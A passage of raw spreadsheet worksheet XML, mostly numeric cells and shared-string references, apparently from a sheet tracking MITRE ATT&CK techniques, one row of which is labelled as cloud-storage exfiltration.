      <c r="BZ89" s="250">
        <v>71</v>
      </c>
      <c r="CA89" s="251" t="s">
        <v>3720</v>
      </c>
      <c r="CB89" s="505">
        <v>57</v>
      </c>
      <c r="CC89" s="252" t="s">
        <v>3721</v>
      </c>
      <c r="CD89" s="252">
        <v>14</v>
      </c>
      <c r="CE89" s="253">
        <v>29</v>
      </c>
      <c r="CF89" s="101">
        <v>94</v>
      </c>
      <c r="CG89" s="102" t="s">
        <v>3722</v>
      </c>
      <c r="CH89" s="102">
        <v>73</v>
      </c>
      <c r="CI89" s="103" t="s">
        <v>3723</v>
      </c>
      <c r="CJ89" s="103">
        <v>22</v>
      </c>
      <c r="CK89" s="104">
        <v>37</v>
      </c>
      <c r="CL89" s="105">
        <v>0</v>
      </c>
      <c r="CM89" s="106">
        <v>0</v>
      </c>
      <c r="CN89" s="497">
        <v>0</v>
      </c>
      <c r="CO89" s="107">
        <v>0</v>
      </c>
      <c r="CP89" s="107">
        <v>0</v>
      </c>
      <c r="CQ89" s="108">
        <v>0</v>
      </c>
      <c r="CR89" s="109">
        <v>1</v>
      </c>
      <c r="CS89" s="110" t="s">
        <v>1960</v>
      </c>
      <c r="CT89" s="501">
        <v>1</v>
      </c>
      <c r="CU89" s="111" t="s">
        <v>1961</v>
      </c>
      <c r="CV89" s="111">
        <v>1</v>
      </c>
      <c r="CW89" s="112">
        <v>1</v>
      </c>
      <c r="CX89" s="113">
        <v>44</v>
      </c>
      <c r="CY89" s="114" t="s">
        <v>2187</v>
      </c>
      <c r="CZ89" s="503">
        <v>37</v>
      </c>
      <c r="DA89" s="115" t="s">
        <v>2188</v>
      </c>
      <c r="DB89" s="115">
        <v>9</v>
      </c>
      <c r="DC89" s="116">
        <v>18</v>
      </c>
      <c r="DD89" s="101">
        <v>0</v>
      </c>
      <c r="DE89" s="102">
        <v>0</v>
      </c>
      <c r="DF89" s="102">
        <v>0</v>
      </c>
      <c r="DG89" s="103">
        <v>0</v>
      </c>
      <c r="DH89" s="103">
        <v>0</v>
      </c>
      <c r="DI89" s="104">
        <v>0</v>
      </c>
      <c r="DJ89" s="105">
        <v>2</v>
      </c>
      <c r="DK89" s="106" t="s">
        <v>3724</v>
      </c>
      <c r="DL89" s="497">
        <v>2</v>
      </c>
      <c r="DM89" s="107" t="s">
        <v>3179</v>
      </c>
      <c r="DN89" s="107">
        <v>2</v>
      </c>
      <c r="DO89" s="108">
        <v>1</v>
      </c>
      <c r="DP89" s="109">
        <v>2</v>
      </c>
      <c r="DQ89" s="110" t="s">
        <v>3724</v>
      </c>
      <c r="DR89" s="501">
        <v>2</v>
      </c>
      <c r="DS89" s="111" t="s">
        <v>3179</v>
      </c>
      <c r="DT89" s="111">
        <v>2</v>
      </c>
      <c r="DU89" s="112">
        <v>1</v>
      </c>
      <c r="DV89" s="113">
        <v>8</v>
      </c>
      <c r="DW89" s="114" t="s">
        <v>3725</v>
      </c>
      <c r="DX89" s="503">
        <v>7</v>
      </c>
      <c r="DY89" s="115" t="s">
        <v>3726</v>
      </c>
      <c r="DZ89" s="115">
        <v>5</v>
      </c>
      <c r="EA89" s="116">
        <v>4</v>
      </c>
      <c r="EB89" s="250">
        <v>4</v>
      </c>
      <c r="EC89" s="251" t="s">
        <v>3727</v>
      </c>
      <c r="ED89" s="505">
        <v>3</v>
      </c>
      <c r="EE89" s="252" t="s">
        <v>3728</v>
      </c>
      <c r="EF89" s="252">
        <v>3</v>
      </c>
      <c r="EG89" s="253">
        <v>1</v>
      </c>
      <c r="EH89" s="101">
        <v>12</v>
      </c>
      <c r="EI89" s="102" t="s">
        <v>3729</v>
      </c>
      <c r="EJ89" s="102">
        <v>10</v>
      </c>
      <c r="EK89" s="103" t="s">
        <v>3730</v>
      </c>
      <c r="EL89" s="103">
        <v>8</v>
      </c>
      <c r="EM89" s="104">
        <v>4</v>
      </c>
      <c r="EN89" s="105">
        <v>0</v>
      </c>
      <c r="EO89" s="106">
        <v>0</v>
      </c>
      <c r="EP89" s="497">
        <v>0</v>
      </c>
      <c r="EQ89" s="107">
        <v>0</v>
      </c>
      <c r="ER89" s="107">
        <v>0</v>
      </c>
      <c r="ES89" s="108">
        <v>0</v>
      </c>
      <c r="ET89" s="109">
        <v>0</v>
      </c>
      <c r="EU89" s="110">
        <v>0</v>
      </c>
      <c r="EV89" s="501">
        <v>0</v>
      </c>
      <c r="EW89" s="111">
        <v>0</v>
      </c>
      <c r="EX89" s="111">
        <v>0</v>
      </c>
      <c r="EY89" s="112">
        <v>0</v>
      </c>
      <c r="EZ89" s="113">
        <v>2</v>
      </c>
      <c r="FA89" s="114" t="s">
        <v>3724</v>
      </c>
      <c r="FB89" s="503">
        <v>2</v>
      </c>
      <c r="FC89" s="115" t="s">
        <v>3179</v>
      </c>
      <c r="FD89" s="115">
        <v>2</v>
      </c>
      <c r="FE89" s="116">
        <v>1</v>
      </c>
      <c r="FF89" s="101">
        <v>11</v>
      </c>
      <c r="FG89" s="102" t="s">
        <v>3731</v>
      </c>
      <c r="FH89" s="102">
        <v>5</v>
      </c>
      <c r="FI89" s="103" t="s">
        <v>1811</v>
      </c>
      <c r="FJ89" s="103">
        <v>2</v>
      </c>
      <c r="FK89" s="104">
        <v>5</v>
      </c>
      <c r="FL89" s="105">
        <v>3</v>
      </c>
      <c r="FM89" s="106" t="s">
        <v>3732</v>
      </c>
      <c r="FN89" s="497">
        <v>2</v>
      </c>
      <c r="FO89" s="107" t="s">
        <v>3187</v>
      </c>
      <c r="FP89" s="107">
        <v>2</v>
      </c>
      <c r="FQ89" s="108">
        <v>1</v>
      </c>
      <c r="FR89" s="109">
        <v>14</v>
      </c>
      <c r="FS89" s="110" t="s">
        <v>3733</v>
      </c>
      <c r="FT89" s="501">
        <v>7</v>
      </c>
      <c r="FU89" s="111" t="s">
        <v>3734</v>
      </c>
      <c r="FV89" s="111">
        <v>4</v>
      </c>
      <c r="FW89" s="112">
        <v>6</v>
      </c>
      <c r="FX89" s="113">
        <v>12</v>
      </c>
      <c r="FY89" s="114" t="s">
        <v>3735</v>
      </c>
      <c r="FZ89" s="503">
        <v>6</v>
      </c>
      <c r="GA89" s="115" t="s">
        <v>3736</v>
      </c>
      <c r="GB89" s="115">
        <v>3</v>
      </c>
      <c r="GC89" s="116">
        <v>6</v>
      </c>
      <c r="GD89" s="250">
        <v>12</v>
      </c>
      <c r="GE89" s="251" t="s">
        <v>3737</v>
      </c>
      <c r="GF89" s="505">
        <v>7</v>
      </c>
      <c r="GG89" s="252" t="s">
        <v>3738</v>
      </c>
      <c r="GH89" s="252">
        <v>5</v>
      </c>
      <c r="GI89" s="253">
        <v>2</v>
      </c>
      <c r="GJ89" s="101">
        <v>24</v>
      </c>
      <c r="GK89" s="102" t="s">
        <v>3739</v>
      </c>
      <c r="GL89" s="102">
        <v>13</v>
      </c>
      <c r="GM89" s="103" t="s">
        <v>3740</v>
      </c>
      <c r="GN89" s="103">
        <v>8</v>
      </c>
      <c r="GO89" s="104">
        <v>7</v>
      </c>
      <c r="GP89" s="105">
        <v>0</v>
      </c>
      <c r="GQ89" s="106">
        <v>0</v>
      </c>
      <c r="GR89" s="497">
        <v>0</v>
      </c>
      <c r="GS89" s="107">
        <v>0</v>
      </c>
      <c r="GT89" s="107">
        <v>0</v>
      </c>
      <c r="GU89" s="108">
        <v>0</v>
      </c>
      <c r="GV89" s="109">
        <v>1</v>
      </c>
      <c r="GW89" s="110" t="s">
        <v>1960</v>
      </c>
      <c r="GX89" s="501">
        <v>1</v>
      </c>
      <c r="GY89" s="111" t="s">
        <v>1961</v>
      </c>
      <c r="GZ89" s="111">
        <v>1</v>
      </c>
      <c r="HA89" s="112">
        <v>1</v>
      </c>
      <c r="HB89" s="113">
        <v>15</v>
      </c>
      <c r="HC89" s="114" t="s">
        <v>3741</v>
      </c>
      <c r="HD89" s="503">
        <v>8</v>
      </c>
      <c r="HE89" s="115" t="s">
        <v>3742</v>
      </c>
      <c r="HF89" s="115">
        <v>5</v>
      </c>
      <c r="HG89" s="116">
        <v>6</v>
      </c>
      <c r="HH89" s="101">
        <v>3</v>
      </c>
      <c r="HI89" s="102" t="s">
        <v>3743</v>
      </c>
      <c r="HJ89" s="102">
        <v>3</v>
      </c>
      <c r="HK89" s="103" t="s">
        <v>319</v>
      </c>
      <c r="HL89" s="103">
        <v>1</v>
      </c>
      <c r="HM89" s="104">
        <v>3</v>
      </c>
      <c r="HN89" s="105">
        <v>24</v>
      </c>
      <c r="HO89" s="106" t="s">
        <v>3744</v>
      </c>
      <c r="HP89" s="497">
        <v>24</v>
      </c>
      <c r="HQ89" s="107" t="s">
        <v>3745</v>
      </c>
      <c r="HR89" s="107">
        <v>2</v>
      </c>
      <c r="HS89" s="108">
        <v>12</v>
      </c>
      <c r="HT89" s="109">
        <v>27</v>
      </c>
      <c r="HU89" s="110" t="s">
        <v>3746</v>
      </c>
      <c r="HV89" s="501">
        <v>27</v>
      </c>
      <c r="HW89" s="111" t="s">
        <v>3747</v>
      </c>
      <c r="HX89" s="111">
        <v>3</v>
      </c>
      <c r="HY89" s="112">
        <v>15</v>
      </c>
      <c r="HZ89" s="113">
        <v>3</v>
      </c>
      <c r="IA89" s="114" t="s">
        <v>3743</v>
      </c>
      <c r="IB89" s="503">
        <v>3</v>
      </c>
      <c r="IC89" s="115" t="s">
        <v>319</v>
      </c>
      <c r="ID89" s="115">
        <v>1</v>
      </c>
      <c r="IE89" s="116">
        <v>3</v>
      </c>
      <c r="IF89" s="250">
        <v>55</v>
      </c>
      <c r="IG89" s="251" t="s">
        <v>3748</v>
      </c>
      <c r="IH89" s="505">
        <v>47</v>
      </c>
      <c r="II89" s="252" t="s">
        <v>3749</v>
      </c>
      <c r="IJ89" s="252">
        <v>6</v>
      </c>
      <c r="IK89" s="253">
        <v>28</v>
      </c>
      <c r="IL89" s="101">
        <v>58</v>
      </c>
      <c r="IM89" s="102" t="s">
        <v>3750</v>
      </c>
      <c r="IN89" s="102">
        <v>50</v>
      </c>
      <c r="IO89" s="103" t="s">
        <v>3751</v>
      </c>
      <c r="IP89" s="103">
        <v>7</v>
      </c>
      <c r="IQ89" s="104">
        <v>31</v>
      </c>
      <c r="IR89" s="105">
        <v>0</v>
      </c>
      <c r="IS89" s="106">
        <v>0</v>
      </c>
      <c r="IT89" s="497">
        <v>0</v>
      </c>
      <c r="IU89" s="107">
        <v>0</v>
      </c>
      <c r="IV89" s="107">
        <v>0</v>
      </c>
      <c r="IW89" s="108">
        <v>0</v>
      </c>
      <c r="IX89" s="109">
        <v>0</v>
      </c>
      <c r="IY89" s="110">
        <v>0</v>
      </c>
      <c r="IZ89" s="501">
        <v>0</v>
      </c>
      <c r="JA89" s="111">
        <v>0</v>
      </c>
      <c r="JB89" s="111">
        <v>0</v>
      </c>
      <c r="JC89" s="112">
        <v>0</v>
      </c>
      <c r="JD89" s="113">
        <v>27</v>
      </c>
      <c r="JE89" s="114" t="s">
        <v>3746</v>
      </c>
      <c r="JF89" s="503">
        <v>27</v>
      </c>
      <c r="JG89" s="115" t="s">
        <v>3747</v>
      </c>
      <c r="JH89" s="115">
        <v>3</v>
      </c>
      <c r="JI89" s="116">
        <v>15</v>
      </c>
      <c r="JJ89" s="101">
        <v>0</v>
      </c>
      <c r="JK89" s="102">
        <v>0</v>
      </c>
      <c r="JL89" s="102">
        <v>0</v>
      </c>
      <c r="JM89" s="103">
        <v>0</v>
      </c>
      <c r="JN89" s="103">
        <v>0</v>
      </c>
      <c r="JO89" s="104">
        <v>0</v>
      </c>
      <c r="JP89" s="105">
        <v>0</v>
      </c>
      <c r="JQ89" s="106">
        <v>0</v>
      </c>
      <c r="JR89" s="497">
        <v>0</v>
      </c>
      <c r="JS89" s="107">
        <v>0</v>
      </c>
      <c r="JT89" s="107">
        <v>0</v>
      </c>
      <c r="JU89" s="108">
        <v>0</v>
      </c>
      <c r="JV89" s="109">
        <v>0</v>
      </c>
      <c r="JW89" s="110">
        <v>0</v>
      </c>
      <c r="JX89" s="501">
        <v>0</v>
      </c>
      <c r="JY89" s="111">
        <v>0</v>
      </c>
      <c r="JZ89" s="111">
        <v>0</v>
      </c>
      <c r="KA89" s="112">
        <v>0</v>
      </c>
      <c r="KB89" s="113">
        <v>0</v>
      </c>
      <c r="KC89" s="114">
        <v>0</v>
      </c>
      <c r="KD89" s="503">
        <v>0</v>
      </c>
      <c r="KE89" s="115">
        <v>0</v>
      </c>
      <c r="KF89" s="115">
        <v>0</v>
      </c>
      <c r="KG89" s="116">
        <v>0</v>
      </c>
      <c r="KH89" s="250">
        <v>0</v>
      </c>
      <c r="KI89" s="251">
        <v>0</v>
      </c>
      <c r="KJ89" s="505">
        <v>0</v>
      </c>
      <c r="KK89" s="252">
        <v>0</v>
      </c>
      <c r="KL89" s="252">
        <v>0</v>
      </c>
      <c r="KM89" s="253">
        <v>0</v>
      </c>
      <c r="KN89" s="101">
        <v>0</v>
      </c>
      <c r="KO89" s="102">
        <v>0</v>
      </c>
      <c r="KP89" s="102">
        <v>0</v>
      </c>
      <c r="KQ89" s="103">
        <v>0</v>
      </c>
      <c r="KR89" s="103">
        <v>0</v>
      </c>
      <c r="KS89" s="104">
        <v>0</v>
      </c>
      <c r="KT89" s="105">
        <v>0</v>
      </c>
      <c r="KU89" s="106">
        <v>0</v>
      </c>
      <c r="KV89" s="497">
        <v>0</v>
      </c>
      <c r="KW89" s="107">
        <v>0</v>
      </c>
      <c r="KX89" s="107">
        <v>0</v>
      </c>
      <c r="KY89" s="108">
        <v>0</v>
      </c>
      <c r="KZ89" s="109">
        <v>0</v>
      </c>
      <c r="LA89" s="110">
        <v>0</v>
      </c>
      <c r="LB89" s="501">
        <v>0</v>
      </c>
      <c r="LC89" s="111">
        <v>0</v>
      </c>
      <c r="LD89" s="111">
        <v>0</v>
      </c>
      <c r="LE89" s="112">
        <v>0</v>
      </c>
      <c r="LF89" s="113">
        <v>0</v>
      </c>
      <c r="LG89" s="114">
        <v>0</v>
      </c>
      <c r="LH89" s="503">
        <v>0</v>
      </c>
      <c r="LI89" s="115">
        <v>0</v>
      </c>
      <c r="LJ89" s="115">
        <v>0</v>
      </c>
      <c r="LK89" s="116">
        <v>0</v>
      </c>
      <c r="LL89" s="117">
        <v>173</v>
      </c>
      <c r="LM89" s="507">
        <v>173</v>
      </c>
      <c r="LN89" s="119">
        <v>0</v>
      </c>
      <c r="LO89" s="119">
        <v>7</v>
      </c>
      <c r="LP89" s="119">
        <v>169</v>
      </c>
      <c r="LQ89" s="119">
        <v>0</v>
      </c>
      <c r="LR89" s="119">
        <v>169</v>
      </c>
      <c r="LS89" s="119">
        <v>169</v>
      </c>
      <c r="LT89" s="382"/>
      <c r="LU89" s="117">
        <v>0</v>
      </c>
      <c r="LV89" s="118">
        <v>0</v>
      </c>
      <c r="LW89" s="507">
        <v>0</v>
      </c>
      <c r="LX89" s="119">
        <v>0</v>
      </c>
      <c r="LY89" s="119">
        <v>0</v>
      </c>
      <c r="LZ89" s="119">
        <v>0</v>
      </c>
      <c r="MA89" s="117">
        <v>0</v>
      </c>
      <c r="MB89" s="118">
        <v>0</v>
      </c>
      <c r="MC89" s="507">
        <v>0</v>
      </c>
      <c r="MD89" s="119">
        <v>0</v>
      </c>
      <c r="ME89" s="119">
        <v>0</v>
      </c>
      <c r="MF89" s="119">
        <v>0</v>
      </c>
      <c r="MG89" s="117">
        <v>0</v>
      </c>
      <c r="MH89" s="118">
        <v>0</v>
      </c>
      <c r="MI89" s="507">
        <v>0</v>
      </c>
      <c r="MJ89" s="119">
        <v>0</v>
      </c>
      <c r="MK89" s="119">
        <v>0</v>
      </c>
      <c r="ML89" s="119">
        <v>0</v>
      </c>
      <c r="MM89" s="117">
        <v>0</v>
      </c>
      <c r="MN89" s="118">
        <v>0</v>
      </c>
      <c r="MO89" s="507">
        <v>0</v>
      </c>
      <c r="MP89" s="119">
        <v>0</v>
      </c>
      <c r="MQ89" s="119">
        <v>0</v>
      </c>
      <c r="MR89" s="119">
        <v>0</v>
      </c>
      <c r="MS89" s="117">
        <v>0</v>
      </c>
      <c r="MT89" s="118">
        <v>0</v>
      </c>
      <c r="MU89" s="507">
        <v>0</v>
      </c>
      <c r="MV89" s="119">
        <v>0</v>
      </c>
      <c r="MW89" s="119">
        <v>0</v>
      </c>
      <c r="MX89" s="119">
        <v>0</v>
      </c>
      <c r="MY89" s="117">
        <v>0</v>
      </c>
      <c r="MZ89" s="118">
        <v>0</v>
      </c>
      <c r="NA89" s="507">
        <v>0</v>
      </c>
      <c r="NB89" s="119">
        <v>0</v>
      </c>
      <c r="NC89" s="119">
        <v>0</v>
      </c>
      <c r="ND89" s="119">
        <v>0</v>
      </c>
      <c r="NE89" s="117">
        <v>0</v>
      </c>
      <c r="NF89" s="118">
        <v>0</v>
      </c>
      <c r="NG89" s="507">
        <v>0</v>
      </c>
      <c r="NH89" s="119">
        <v>0</v>
      </c>
      <c r="NI89" s="119">
        <v>0</v>
      </c>
      <c r="NJ89" s="119">
        <v>0</v>
      </c>
      <c r="NK89" s="117">
        <v>7</v>
      </c>
      <c r="NL89" s="118" t="s">
        <v>4407</v>
      </c>
      <c r="NM89" s="507">
        <v>7</v>
      </c>
      <c r="NN89" s="119" t="s">
        <v>4408</v>
      </c>
      <c r="NO89" s="119">
        <v>3</v>
      </c>
      <c r="NP89" s="119">
        <v>4</v>
      </c>
      <c r="NQ89" s="117">
        <v>0</v>
      </c>
      <c r="NR89" s="118">
        <v>0</v>
      </c>
      <c r="NS89" s="507">
        <v>0</v>
      </c>
      <c r="NT89" s="119">
        <v>0</v>
      </c>
      <c r="NU89" s="119">
        <v>0</v>
      </c>
      <c r="NV89" s="119">
        <v>0</v>
      </c>
      <c r="NW89" s="117">
        <v>166</v>
      </c>
      <c r="NX89" s="118" t="s">
        <v>4409</v>
      </c>
      <c r="NY89" s="507">
        <v>166</v>
      </c>
      <c r="NZ89" s="119" t="s">
        <v>4270</v>
      </c>
      <c r="OA89" s="119">
        <v>4</v>
      </c>
      <c r="OB89" s="119">
        <v>166</v>
      </c>
      <c r="OC89" s="120">
        <v>1</v>
      </c>
      <c r="OD89" s="120">
        <v>1</v>
      </c>
      <c r="OE89" s="120">
        <v>1</v>
      </c>
      <c r="OF89" s="121">
        <v>1</v>
      </c>
      <c r="OG89" s="120">
        <v>1</v>
      </c>
      <c r="OH89" s="120">
        <v>1</v>
      </c>
      <c r="OI89" s="120">
        <v>1</v>
      </c>
      <c r="OJ89" s="120">
        <v>1</v>
      </c>
      <c r="OK89" s="383"/>
      <c r="OL89" s="120">
        <v>0</v>
      </c>
      <c r="OM89" s="120">
        <v>0</v>
      </c>
      <c r="ON89" s="120">
        <v>0</v>
      </c>
      <c r="OO89" s="195"/>
      <c r="OP89" s="195">
        <v>0</v>
      </c>
      <c r="OQ89" s="464">
        <v>0</v>
      </c>
      <c r="OR89" s="120">
        <v>0</v>
      </c>
      <c r="OS89" s="120">
        <v>0</v>
      </c>
      <c r="OT89" s="120">
        <v>0</v>
      </c>
      <c r="OU89" s="195"/>
      <c r="OV89" s="195">
        <v>0</v>
      </c>
      <c r="OW89" s="464">
        <v>0</v>
      </c>
      <c r="OX89" s="120">
        <v>0</v>
      </c>
      <c r="OY89" s="120">
        <v>0</v>
      </c>
      <c r="OZ89" s="120">
        <v>0</v>
      </c>
      <c r="PA89" s="195"/>
      <c r="PB89" s="195">
        <v>0</v>
      </c>
      <c r="PC89" s="464">
        <v>0</v>
      </c>
      <c r="PD89" s="120">
        <v>0</v>
      </c>
      <c r="PE89" s="120">
        <v>0</v>
      </c>
      <c r="PF89" s="120">
        <v>0</v>
      </c>
      <c r="PG89" s="195"/>
      <c r="PH89" s="195">
        <v>0</v>
      </c>
      <c r="PI89" s="464">
        <v>0</v>
      </c>
      <c r="PJ89" s="120">
        <v>1</v>
      </c>
      <c r="PK89" s="120">
        <v>1</v>
      </c>
      <c r="PL89" s="120">
        <v>1</v>
      </c>
      <c r="PM89" s="195" t="s">
        <v>3752</v>
      </c>
      <c r="PN89" s="195">
        <v>1</v>
      </c>
      <c r="PO89" s="464">
        <v>1</v>
      </c>
      <c r="PP89" s="120">
        <v>1</v>
      </c>
      <c r="PQ89" s="120">
        <v>1</v>
      </c>
      <c r="PR89" s="120">
        <v>1</v>
      </c>
      <c r="PS89" s="195" t="s">
        <v>2517</v>
      </c>
      <c r="PT89" s="195">
        <v>1</v>
      </c>
      <c r="PU89" s="464">
        <v>1</v>
      </c>
      <c r="PV89" s="120">
        <v>0</v>
      </c>
      <c r="PW89" s="120">
        <v>0</v>
      </c>
      <c r="PX89" s="120">
        <v>0</v>
      </c>
      <c r="PY89" s="195"/>
      <c r="PZ89" s="195">
        <v>0</v>
      </c>
      <c r="QA89" s="464">
        <v>0</v>
      </c>
      <c r="QB89" s="120">
        <v>0</v>
      </c>
      <c r="QC89" s="120">
        <v>0</v>
      </c>
      <c r="QD89" s="120">
        <v>0</v>
      </c>
      <c r="QE89" s="195"/>
      <c r="QF89" s="195">
        <v>0</v>
      </c>
      <c r="QG89" s="464">
        <v>0</v>
      </c>
      <c r="QH89" s="120">
        <v>0</v>
      </c>
      <c r="QI89" s="120">
        <v>0</v>
      </c>
      <c r="QJ89" s="120">
        <v>0</v>
      </c>
      <c r="QK89" s="195"/>
      <c r="QL89" s="195">
        <v>0</v>
      </c>
      <c r="QM89" s="464">
        <v>0</v>
      </c>
      <c r="QN89" s="120">
        <v>0</v>
      </c>
      <c r="QO89" s="120">
        <v>0</v>
      </c>
      <c r="QP89" s="120">
        <v>0</v>
      </c>
      <c r="QQ89" s="195"/>
      <c r="QR89" s="195">
        <v>0</v>
      </c>
      <c r="QS89" s="464">
        <v>0</v>
      </c>
      <c r="QT89" s="184"/>
      <c r="QU89" s="184"/>
      <c r="QV89" s="184"/>
      <c r="QW89" s="184"/>
      <c r="QX89" s="184"/>
      <c r="QY89" s="184"/>
      <c r="QZ89" s="184"/>
      <c r="RA89" s="184"/>
      <c r="RB89" s="184"/>
      <c r="RC89" s="184"/>
      <c r="RD89" s="184"/>
      <c r="RE89" s="184"/>
      <c r="RF89" s="184"/>
      <c r="RG89" s="184"/>
      <c r="RH89" s="184"/>
      <c r="RI89" s="184"/>
      <c r="RJ89" s="184"/>
      <c r="RK89" s="184"/>
      <c r="RL89" s="184"/>
      <c r="RM89" s="184"/>
      <c r="RN89" s="184"/>
      <c r="RO89" s="184"/>
      <c r="RP89" s="184"/>
      <c r="RQ89" s="184"/>
      <c r="RR89" s="184"/>
      <c r="RS89" s="184"/>
      <c r="RT89" s="184"/>
      <c r="RU89" s="184"/>
      <c r="RV89" s="184"/>
      <c r="RW89" s="184"/>
      <c r="RX89" s="184"/>
      <c r="RY89" s="184"/>
      <c r="RZ89" s="184"/>
      <c r="SA89" s="184"/>
      <c r="SB89" s="184"/>
      <c r="SC89" s="184"/>
      <c r="SD89" s="184"/>
      <c r="SE89" s="184"/>
      <c r="SF89" s="184"/>
      <c r="SG89" s="184"/>
      <c r="SH89" s="184"/>
      <c r="SI89" s="184"/>
      <c r="SJ89" s="184"/>
      <c r="SK89" s="184"/>
      <c r="SL89" s="184"/>
      <c r="SM89" s="184"/>
      <c r="SN89" s="184"/>
      <c r="SO89" s="184"/>
      <c r="SP89" s="184"/>
      <c r="SQ89" s="184"/>
      <c r="SR89" s="184"/>
      <c r="SS89" s="184"/>
      <c r="ST89" s="184"/>
      <c r="SU89" s="184"/>
      <c r="SV89" s="184"/>
      <c r="SW89" s="184"/>
      <c r="SX89" s="184"/>
      <c r="SY89" s="184"/>
      <c r="SZ89" s="184"/>
      <c r="TA89" s="184"/>
      <c r="TB89" s="184"/>
      <c r="TC89" s="184"/>
      <c r="TD89" s="184"/>
      <c r="TE89" s="184"/>
      <c r="TF89" s="184"/>
      <c r="TG89" s="184"/>
      <c r="TH89" s="184"/>
      <c r="TI89" s="184"/>
      <c r="TJ89" s="184"/>
      <c r="TK89" s="184"/>
      <c r="TL89" s="184"/>
      <c r="TM89" s="184"/>
      <c r="TN89" s="184"/>
      <c r="TO89" s="184"/>
      <c r="TP89" s="184"/>
      <c r="TQ89" s="184"/>
      <c r="TR89" s="184"/>
      <c r="TS89" s="184"/>
      <c r="TT89" s="184"/>
      <c r="TU89" s="184"/>
      <c r="TV89" s="184"/>
      <c r="TW89" s="184"/>
      <c r="TX89" s="184"/>
      <c r="TY89" s="184"/>
      <c r="TZ89" s="184"/>
      <c r="UA89" s="184"/>
      <c r="UB89" s="184"/>
      <c r="UC89" s="184"/>
      <c r="UD89" s="184"/>
      <c r="UE89" s="184"/>
      <c r="UF89" s="184"/>
      <c r="UG89" s="184"/>
      <c r="UH89" s="184"/>
      <c r="UI89" s="184"/>
      <c r="UJ89" s="184"/>
      <c r="UK89" s="184"/>
      <c r="UL89" s="184"/>
      <c r="UM89" s="184"/>
      <c r="UN89" s="184"/>
      <c r="UO89" s="184"/>
      <c r="UP89" s="184"/>
      <c r="UQ89" s="184"/>
      <c r="UR89" s="184"/>
      <c r="US89" s="184"/>
      <c r="UT89" s="184"/>
      <c r="UU89" s="184"/>
      <c r="UV89" s="184"/>
      <c r="UW89" s="184"/>
      <c r="UX89" s="184"/>
      <c r="UY89" s="184"/>
      <c r="UZ89" s="184"/>
      <c r="VA89" s="184"/>
      <c r="VB89" s="184"/>
      <c r="VC89" s="184"/>
      <c r="VD89" s="184"/>
      <c r="VE89" s="184"/>
      <c r="VF89" s="184"/>
      <c r="VG89" s="184"/>
      <c r="VH89" s="184"/>
      <c r="VI89" s="184"/>
      <c r="VJ89" s="184"/>
      <c r="VK89" s="184"/>
      <c r="VL89" s="184"/>
      <c r="VM89" s="184"/>
      <c r="VN89" s="184"/>
      <c r="VO89" s="184"/>
      <c r="VP89" s="184"/>
      <c r="VQ89" s="184"/>
      <c r="VR89" s="184"/>
      <c r="VS89" s="184"/>
      <c r="VT89" s="184"/>
      <c r="VU89" s="184"/>
      <c r="VV89" s="184"/>
      <c r="VW89" s="184"/>
      <c r="VX89" s="184"/>
      <c r="VY89" s="184"/>
    </row>
    <row r="90" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A90" s="82" t="s">
        <v>14</v>
      </c>
      <c r="B90" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C90" s="83" t="s">
        <v>318</v>
      </c>
      <c r="D90" s="83" t="s">
        <v>1519</v>
      </c>
      <c r="E90" s="83">
        <f t="shared" si="5"/>
        <v>58</v>
      </c>
      <c r="F90" s="83" t="s">
        <v>133</v>
      </c>
      <c r="G90" s="83" t="s">
        <v>1520</v>
      </c>
      <c r="H90" s="83" t="s">
        <v>1521</v>
      </c>
      <c r="I90" s="81" t="s">
        <v>1522</v>
      </c>
      <c r="J90" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K90" s="81" t="s">
        <v>1523</v>
      </c>
      <c r="L90" s="81" t="s">
        <v>1524</v>
      </c>
      <c r="M90" s="378" t="s">
        <v>249</v>
      </c>
      <c r="N90" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O90" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P90" s="91"/>
      <c r="Q90" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R90" s="92" t="s">
        <v>1186</v>
      </c>
      <c r="S90" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T90" s="92" t="s">
        <v>1450</v>
      </c>
      <c r="U90" s="94" t="s">
        <v>1525</v>
      </c>
      <c r="V90" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W90" s="96" t="s">
        <v>1526</v>
      </c>
      <c r="X90" s="97" t="s">
        <v>1527</v>
      </c>
      <c r="Y90" s="83" t="s">
        <v>1528</v>
      </c>
      <c r="Z90" s="188" t="s">
        <v>1529</v>
      </c>
      <c r="AA90" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB90" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC90" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD90" s="83"/>
      <c r="AE90" s="83"/>
      <c r="AF90" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG90" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH90" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI90" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ90" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK90" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL90" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM90" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN90" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO90" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP90" s="385" t="str">
        <f>M90&amp;"-frag"</f>
        <v>T1567.002-Exfiltration_To_Cloud_Storage-frag</v>
      </c>
      <c r="AQ90" s="358">
        <v>26</v>
      </c>
      <c r="AR90" s="100"/>
      <c r="AS90" s="100">
        <v>1</v>
      </c>
      <c r="AT90" s="100">
        <v>0</v>
      </c>
      <c r="AU90" s="100">
        <v>1</v>
      </c>
      <c r="AV90" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW90" s="100">
        <v>1</v>
      </c>
      <c r="AX90" s="100">
        <v>1</v>
      </c>
      <c r="AY90" s="100">
        <v>0</v>
      </c>
      <c r="AZ90" s="100">
        <v>1</v>
      </c>
      <c r="BA90" s="381"/>
      <c r="BB90" s="101">
        <v>5</v>
      </c>
      <c r="BC90" s="102" t="s">
        <v>2050</v>
      </c>
      <c r="BD90" s="102">
        <v>5</v>
      </c>
      <c r="BE90" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="BF90" s="103">
        <v>3</v>
      </c>
